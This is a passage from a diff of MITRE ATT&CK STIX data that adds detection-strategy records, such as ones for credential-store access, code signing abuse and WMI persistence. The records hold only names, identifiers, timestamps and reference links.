+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--48923678-0fb6-4d14-986b-2f6adeb8c421",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-16 16:45:43.694000+00:00",
+                    "modified": "2026-05-12 16:30:18.390000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0899",
+                            "external_id": "DET0899"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Social Engineering",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--54bb8256-cbe8-4088-9cff-b03711bd7841",
+                        "x-mitre-analytic--983e1849-6af7-491e-9605-46b9bf54bbd1",
+                        "x-mitre-analytic--e817eb45-0830-476d-9fd7-8e8acb14af8a",
+                        "x-mitre-analytic--f238e0f3-7354-4304-9101-69cefd8446fc",
+                        "x-mitre-analytic--fc19b602-2811-418f-aa98-1b49f1355743"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2026-04-16 16:45:43.694000+00:00\", \"old_value\": \"2026-04-16T16:45:43.694Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.390000+00:00\", \"old_value\": \"2026-04-24T20:22:37.160Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--73cde34a-247f-4ebc-87a5-ab6a9c400f40",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.681000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0452",
+                            "external_id": "DET0452"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Subversion of Trust Controls via Certificate, Registry, and Attribute Manipulation",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--35b0b263-f85d-4e6a-8bcb-5e2c1a9da080",
+                        "x-mitre-analytic--06ec22c9-b32f-49bc-81cc-ed5cee622493",
+                        "x-mitre-analytic--94340be7-068e-446a-bca2-d414b66912fc"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.681000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--90123c20-ff3d-4034-9a5f-905444bb0311",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.684000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0037",
+                            "external_id": "DET0037"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Suspicious Access to Browser Credential Stores",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c4eb93f1-0288-4884-bdbc-800e7a8e87c3",
+                        "x-mitre-analytic--e11709c9-0203-4f76-bbfb-379ed36723ce",
+                        "x-mitre-analytic--1a068df0-67d4-4521-aeda-75fa8e9f8d98"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.684000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--84b5d372-eedb-4b69-bf78-9d4815e2b2b7",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.683000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0549",
+                            "external_id": "DET0549"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Suspicious Access to Private Key Files and Export Attempts Across Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--eb569d45-a5b6-47df-a098-bdb26ef0597f",
+                        "x-mitre-analytic--3577f79d-0891-451b-a861-1a03a3688a93",
+                        "x-mitre-analytic--d7a9c7c8-81a0-4988-9617-51f191ab32c8",
+                        "x-mitre-analytic--57a547e1-1086-427c-9ea8-59059dec1938"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.683000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--119f2b00-82ac-41fb-96ac-728bf56a8a29",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.669000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0134",
+                            "external_id": "DET0134"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Suspicious Access to Windows Credential Manager",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--207b58a9-7e3b-41ca-bb5a-c66b24210a83"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.669000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f07cfa67-8a83-4a62-ae18-bee29bfc7569",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.697000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0057",
+                            "external_id": "DET0057"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Suspicious Access to securityd Memory for Credential Extraction",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--94628b16-2443-4e66-9f7b-a61a39012a9c",
+                        "x-mitre-analytic--9e0af3ac-dfeb-48c3-8d15-5f9edd69be69"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.697000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--01cc085c-7d7d-49fc-9d15-bc5b2226026a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.667000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0230",
+                            "external_id": "DET0230"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Suspicious or Malicious Code Signing Abuse",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--b5d77678-fff4-41cd-9e77-d3f82243240a",
+                        "x-mitre-analytic--969bd6a3-b89f-4279-9bd2-3fc461880308"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.667000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--90b6ef43-3f63-47c5-af59-ed4f95cc9c87",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.685000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0141",
+                            "external_id": "DET0141"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Time-Based Evasion via Sleep, Timer Loops, and Delayed Execution",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--10c89810-d298-42d6-80dd-1228e737e33f",
+                        "x-mitre-analytic--2bbe41df-b8a6-4503-8fb0-028b7387cb1d",
+                        "x-mitre-analytic--fbbe7372-5d33-4181-a68a-e68f5da94df7"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.685000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f69d3378-a034-4709-9778-6efd2269e097",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.698000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0130",
+                            "external_id": "DET0130"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Unauthorized Access to Cloud Secrets Management Stores",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--90eca5d7-c330-4b86-bde6-de04019cbba7"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.698000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--a5600691-be46-424a-b8ef-a2c9159da49a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.686000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0597",
+                            "external_id": "DET0597"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Unauthorized Access to Password Managers",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--18ab8a54-68bc-4d43-884d-2b9284eb723e",
+                        "x-mitre-analytic--93fd8592-d8ce-4b5e-b095-71cd66062298",
+                        "x-mitre-analytic--de1d4807-fcb5-4112-b310-ea0c4df45af2"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.686000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--a9b4dd72-07f2-4fd5-b46b-2fe9f6945f14",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.687000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0111",
+                            "external_id": "DET0111"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Unsecured Credentials Shared in Chat Messages",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--631da3e4-5ecd-4dc9-966a-1c2633f8f24c",
+                        "x-mitre-analytic--bafd38ad-aebd-40f1-9f17-bd63a1c74ba9"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.687000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--8d30c115-84f7-4fcc-ba22-96cb092d8114",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.684000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0074",
+                            "external_id": "DET0074"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Use of Stolen Web Session Cookies Across Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--8d43ac43-de80-4815-b992-6f49519ed340",
+                        "x-mitre-analytic--32ace35c-66c4-48d7-a8bc-d81c65f4451b",
+                        "x-mitre-analytic--126cff4b-4ba7-4464-bfc8-4daabed5e05b"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.684000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--5463d676-c300-4ab8-9980-d3ed37ac4723",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.677000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0420",
+                            "external_id": "DET0420"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect User Activity Based Sandbox Evasion via Input & Artifact Probing",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--5bd6658f-4391-4d77-bed8-9b141b0fa3ae",
+                        "x-mitre-analytic--21773356-1c94-4edc-b368-008c86a5929e",
+                        "x-mitre-analytic--e3a0ea8d-0018-4603-912a-4d40d0f75390"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.677000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--99e60eb7-f2fa-4423-8c51-29832cd6e7ef",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.685000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0086",
+                            "external_id": "DET0086"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect WMI Event Subscription for Persistence via WmiPrvSE Process and MOF Compilation",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--1a0640f0-e286-405f-9ab3-507c1abb77da"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.685000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--488ef272-b2fa-4501-ab6e-97e3ac01816c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-16 17:34:53.603000+00:00",
+                    "modified": "2026-05-12 16:30:18.390000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0901",
+                            "external_id": "DET0901"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Windows Firewall",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--702db8b6-641f-4526-a0d0-a5a62c499508"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2026-04-16 17:34:53.603000+00:00\", \"old_value\": \"2026-04-16T17:34:53.603Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.390000+00:00\", \"old_value\": \"2026-04-24T20:22:49.681Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--63135c50-7c7a-4a44-a053-28abd2388f21",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.679000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0404",
+                            "external_id": "DET0404"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Winlogon Helper DLL Abuse via Registry and Process Artifacts on Windows",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e8569cdc-a018-4eee-95d9-5979cebae519"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.679000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--4994627c-216b-4832-90cf-074d3e9013e4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.676000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0205",
+                            "external_id": "DET0205"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect XSL Script Abuse via msxsl and wmic",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f313053f-5898-4f47-b263-a60098f5c963"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.676000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--2f7a5ebd-e025-4822-aed2-46fc3ec1a0a9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
